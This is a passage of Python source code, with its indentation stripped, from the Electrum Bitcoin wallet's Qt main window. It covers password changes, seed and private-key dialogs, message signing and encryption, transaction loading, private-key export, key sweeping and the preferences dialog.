self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from electrum.storage import STO_EV_XPUB_PW
if self.wallet.get_available_storage_encryption_version() == STO_EV_XPUB_PW:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(str(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
tab = self.tabs.currentWidget()
#if hasattr(tab, 'searchable_list'):
# tab.searchable_list.toggle_toolbar()
#return
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(280)
line2 = QLineEdit()
line2.setFixedWidth(280)
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_master_public_keys(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('True') if self.wallet.has_seed() else _('False')
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + f' {key+1} ( keystore: {keystore_types[key]} )'
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(str(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk, redeem_script = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(str(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
if redeem_script:
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=redeem_script)
rds_e.addCopyButton(self.app)
vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt):
from electrum.transaction import tx_from_str
try:
tx = tx_from_str(txt)
return Transaction(tx)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + str(e))
return
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(str(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if str(data).startswith("bitcoin:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
try:
data = bh2u(bitcoin.base_decode(data, length=None, base=43))
except BaseException as e:
self.show_error((_('Could not decode QR code')+':\n{}').format(repr(e)))
return
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + str(e))
return
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)[0]
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def import_labels(path):
def _validate(data):
return data # TODO
def import_labels_assign(data):
for key, value in data.items():
self.wallet.set_label(key, value)
import_meta(path, _validate, import_labels_assign)
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), import_labels, on_import)
def do_export_labels(self):
def export_labels(filename):
export_meta(self.wallet.labels, filename)
export_meta_gui(self, _('labels'), export_labels)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {str(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
try:
coins, keypairs = sweep_preparations(get_pk(), self.network)
except Exception as e: # FIXME too broad...
self.show_message(str(e))
return
self.do_clear()
self.tx_external_keypairs = keypairs
self.spend_coins(coins)
self.payto_e.setText(addr)
self.spend_max()
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
self.warn_if_watching_only()
def _do_import(self, title, header_layout, func):
text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
fee_widgets = []
tx_widgets = []
id_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electrum.i18n import languages
lang_combo.addItems(list(languages.values()))
lang_keys = list(languages.keys())
lang_cur_setting = self.config.get("language", '')
try:
index = lang_keys.index(lang_cur_setting)
except ValueError: # not in list
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = list(languages.keys())[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
msg = '\n'.join([
_('Time based: fee rate is based on average confirmation time estimates'),
_('Mempool based: fee rate is targeting a depth in the memory pool')
]
)
fee_type_label = HelpLabel(_('Fee estimation') + ':', msg)
fee_type_combo = QComboBox()
fee_type_combo.addItems([_('Static'), _('ETA'), _('Mempool')])
fee_type_combo.setCurrentIndex((2 if self.config.use_mempool_fees() else 1) if self.config.is_dynfee() else 0)
def on_fee_type(x):
self.config.set_key('mempool_fees', x==2)
self.config.set_key('dynamic_fees', x>0)
self.fee_slider.update()
fee_type_combo.currentIndexChanged.connect(on_fee_type)
fee_widgets.append((fee_type_label, fee_type_combo))
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', False))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_adv_controls.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
use_rbf = self.config.get('use_rbf', True)
use_rbf_cb = QCheckBox(_('Use Replace-By-Fee'))
use_rbf_cb.setChecked(use_rbf)
use_rbf_cb.setToolTip(
_('If you check this box, your transactions will be marked as non-final,') + '\n' + \
_('and you will have the possibility, while they are unconfirmed, to replace them with transactions that pay higher fees.') + '\n' + \
_('Note that some merchants do not accept non-final transactions until they are confirmed.'))
def on_use_rbf(x):
self.config.set_key('use_rbf', bool(x))
batch_rbf_cb.setEnabled(bool(x))
use_rbf_cb.stateChanged.connect(on_use_rbf)
fee_widgets.append((use_rbf_cb, None))
batch_rbf_cb = QCheckBox(_('Batch RBF transactions'))
batch_rbf_cb.setChecked(self.config.get('batch_rbf', False))
batch_rbf_cb.setEnabled(use_rbf)
batch_rbf_cb.setToolTip(
_('If you check this box, your unconfirmed transactions will be consolidated into a single transaction.') + '\n' + \
_('This will save fees.'))
def on_batch_rbf(x):
self.config.set_key('batch_rbf', bool(x))
batch_rbf_cb.stateChanged.connect(on_batch_rbf)
fee_widgets.append((batch_rbf_cb, None))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see https://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
else:
alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = base_units_list
msg = (_('Base unit of your wallet.')
+ '\n1 BTC = 1000 mBTC. 1 mBTC = 1000 bits. 1 bit = 100 sat.\n'
+ _('This setting affects the Send tab, and all balance related fields.'))
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x, nz):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
self.decimal_point = base_unit_name_to_decimal_point(unit_result)
self.config.set_key('decimal_point', self.decimal_point, True)
nz.setMaximum(self.decimal_point)
self.history_list.update()
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
gui_widgets.append((unit_label, unit_combo))
block_explorers = sorted(util.block_explorer_info().keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
from electrum import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.libzbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
colortheme_combo = QComboBox()
colortheme_combo.addItem(_('Light'), 'default')
colortheme_combo.addItem(_('Dark'), 'dark')
index = colortheme_combo.findData(self.config.get('qt_gui_color_theme', 'default'))
colortheme_combo.setCurrentIndex(index)
colortheme_label = QLabel(_('Color theme') + ':')
def on_colortheme(x):
self.config.set_key('qt_gui_color_theme', colortheme_combo.itemData(x), True)
self.need_restart = True
colortheme_combo.currentIndexChanged.connect(on_colortheme)
gui_widgets.append((colortheme_label, colortheme_combo))
updatecheck_cb = QCheckBox(_("Automatically check for software updates"))
updatecheck_cb.setChecked(self.config.get('check_updates', False))
def on_set_updatecheck(v):
self.config.set_key('check_updates', v == Qt.Checked, save=True)
updatecheck_cb.stateChanged.connect(on_set_updatecheck)
gui_widgets.append((updatecheck_cb, None))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
tx_widgets.append((usechange_cb, None))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
_('This may result in higher transactions fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
if len(choosers) > 1:
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
